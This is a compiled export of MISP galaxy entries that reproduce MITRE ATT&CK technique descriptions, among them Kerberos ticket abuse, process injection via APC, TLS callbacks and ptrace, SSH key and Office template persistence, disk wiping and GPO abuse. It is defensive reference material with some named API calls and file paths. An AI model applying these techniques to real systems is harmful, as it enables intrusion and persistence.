When performing PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks)

A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)

A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)

Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket. (Citation: Stealthbits Overpass-the-Hash)

The tag is: `misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003"`

**Table 3215. Table References**

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Web Portal Capture - T1056.003

Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)

The tag is: `misp-galaxy:mitre-attack-pattern="Web Portal Capture - T1056.003"`

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Container Orchestration Job - T1053.007

Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.

In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes)

The tag is: `misp-galaxy:mitre-attack-pattern="Container Orchestration Job - T1053.007"`

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</table>
Windows Command Shell - T1059.003

Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.

The tag is: `misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"`

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Network Trust Dependencies - T1590.003

Adversaries may gather information about the victim’s network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: `misp-galaxy:mitre-attack-pattern="Network Trust Dependencies - T1590.003"`

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Space after Filename - T1036.006

Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.

For example, if there is a Mach-O executable file called `<code>evil.bin</code>`, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to `<code>evil.txt</code>`, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to `<code>evil.txt </code>` (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:mitre-attack-pattern="Space after Filename - T1036.006"

Table 3220. Table References

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Install Digital Certificate - T1608.003

Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)

Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers.

Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire
Infrastructure or previously compromised (Compromise Infrastructure).

The tag is: *misp-galaxy:mitre-attack-pattern="Install Digital Certificate - T1608.003"

**Table 3221. Table References**

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**Asynchronous Procedure Call - T1055.004**

Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.

APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. (Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as `<code>OpenThread</code>`. At this point `<code>QueueUserAPC</code>` can be used to invoke a function (such as `<code>LoadLibraryA</code>` pointing to a malicious DLL).

A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: *misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004"

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1373
Web Session Cookie - T1550.004

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated. (Citation: Pass The Cookie)

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems. (Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004"

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Credential API Hooking - T1056.004

Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials. (Citation: Microsoft TrojanSpy:Win32/Ursnif.genI Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:

- **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)

- **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Elastic Process Injection July 2017)
Inline hooking, which overwrites the first bytes in an API function to redirect code flow.

The tag is: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004"

Table 3224. Table References

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SSH Authorized Keys - T1098.004

Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>~/.ssh/authorized_keys</code>. Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.
Adversaries may modify SSH `<code>authorized_keys</code>` files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH. (Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)

The tag is: `misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004"`

**Thread Local Storage - T1055.005**

Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.

TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012). (Citation: FireEye TLS Nov 2017)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: `misp-galaxy:mitre-attack-pattern="Thread Local Storage - T1055.005"`

**Table 3226. Table References**

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Ptrace System Calls - T1055.008

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values. (Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: `malloc`) then invoking that memory with `PTRACE_SETREGS` to set the register containing the next instruction to execute. Ptrace system call injection can also be done with `PTRACE_POKETEXT`/`PTRACE_POKEDATA`, which copy data to a specific address in the target processes' memory (ex: the current address of the next instruction). (Citation: PTRACE man) (Citation: Medium Ptrace JUL 2018)

Ptrace system call injection may not be possible targeting processes with high-privileges, and on some system those that are non-child processes. (Citation: BH Linux Inject)

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: `misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1055.008"`

Table 3227. Table References

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Network Security Appliances - T1590.006

Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: `misp-galaxy:mitre-attack-pattern="Network Security Appliances - T1590.006"`

**Table 3228. Table References**

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**Network Device CLI - T1059.008**

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH).

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)

The tag is: `misp-galaxy:mitre-attack-pattern="Network Device CLI - T1059.008"`

**Table 3229. Table References**

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</table>
Local Email Collection - T1114.001

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user's local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\<username>\Documents\Outlook Files` or `C:\Users\<username>\AppData\Local\Microsoft\Outlook`. (Citation: Microsoft Outlook Files)

The tag is: `misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001"`

Table 3230. Table References

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Remote Email Collection - T1114.002

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.

The tag is: `misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002"`

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Compiled HTML File - T1218.001

Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

The tag is: *misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001"*

### Table References

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### Email Forwarding Rule - T1114.003

Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim's organization to use as part of further exploits or operations. (Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Similarly, Google Workspace users or administrators can set up mail forwarding rules via the Google Workspace web interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes. (Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.

The tag is: *misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003"*

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1380
Office Template Macros - T1137.001

Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)

Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. (Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations. (Citation: GlobalDotName Jun 2019)

Word
<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>

Excel
<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>

Adversaries may also change the location of the base template to point to their own by hijacking the application’s search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location. (Citation: GlobalDotName Jun 2019)

An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.

The tag is: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001"

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**Disk Content Wipe - T1561.001**

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface. Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares. This behavior is distinct from Data Destruction.

The tag is: *misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001"

Table 3235. Table References

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**Security Software Discovery - T1518.001**

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape...
follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)

The tag is: *misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001"*

Table 3236. Table References

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**Determine Physical Locations - T1591.001**

Adversaries may gather the victim’s physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).

The tag is: *misp-galaxy:mitre-attack-pattern="Determine Physical Locations - T1591.001"*

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Credentials In Files - T1552.001

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)

The tag is: `misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001"`

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<td><a href="https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/">https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/</a></td>
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Disk Structure Wipe - T1561.002

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in
structures such as the master boot record (MBR) or partition table. The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002). The tag is: *misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002"*

**Table 3239. Table References**

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**Parent PID Spoofing - T1134.004**

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the `<code>CreateProcess</code>` API call, which supports a parameter that defines the PPID to use. (Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via `<code>svchost.exe</code>` or `<code>consent.exe</code>`) rather than the current user context. (Citation: Microsoft UAC Nov 2018)

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1218/011) to be `<code>explorer.exe</code>` rather than an
Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). (Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106). (Citation: CTD PPID Spoofing Macro Mar 2019) (Citation: CounterCept PPID Spoofing Dec 2018)

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as `<code>lsass.exe</code>`), causing the new process to be elevated via the inherited access token. (Citation: XPNSec PPID Nov 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004"`

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### Outlook Home Page - T1137.004

Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page. (Citation: SensePost Outlook Home Page)

Once malicious home pages have been added to the user's mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded. (Citation: SensePost Outlook Home Page)

The tag is: `misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004"`

### Table 3241. Table References
Identify Business Tempo - T1591.003

Adversaries may gather information about the victim’s business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))

The tag is: **misp-galaxy:mitre-attack-pattern="Identify Business Tempo - T1591.003"**

Table 3242. Table References

Group Policy Modification - T1484.001

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `<code>&lt;DOMAIN&gt;\SYSVOL&lt;DOMAIN&gt;\Policies</code>`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control
permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)

For example, publicly available scripts such as `<code>New-GPOImmediateTask</code>` can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying `<code>&lt;GPO_PATH&gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>`.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in `<code>&lt;GPO_PATH&gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code> to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary’s control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)

The tag is: `misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001"`

**Table 3243. Table References**

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**Setuid and Setgid - T1548.001**

An adversary may perform shell escapes or exploit vulnerabilities in an application with the setuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in
the current user's context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.

Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits with via bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>.

Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).

The tag is: <code>misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001"</code>

### Direct Network Flood - T1498.001

Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.

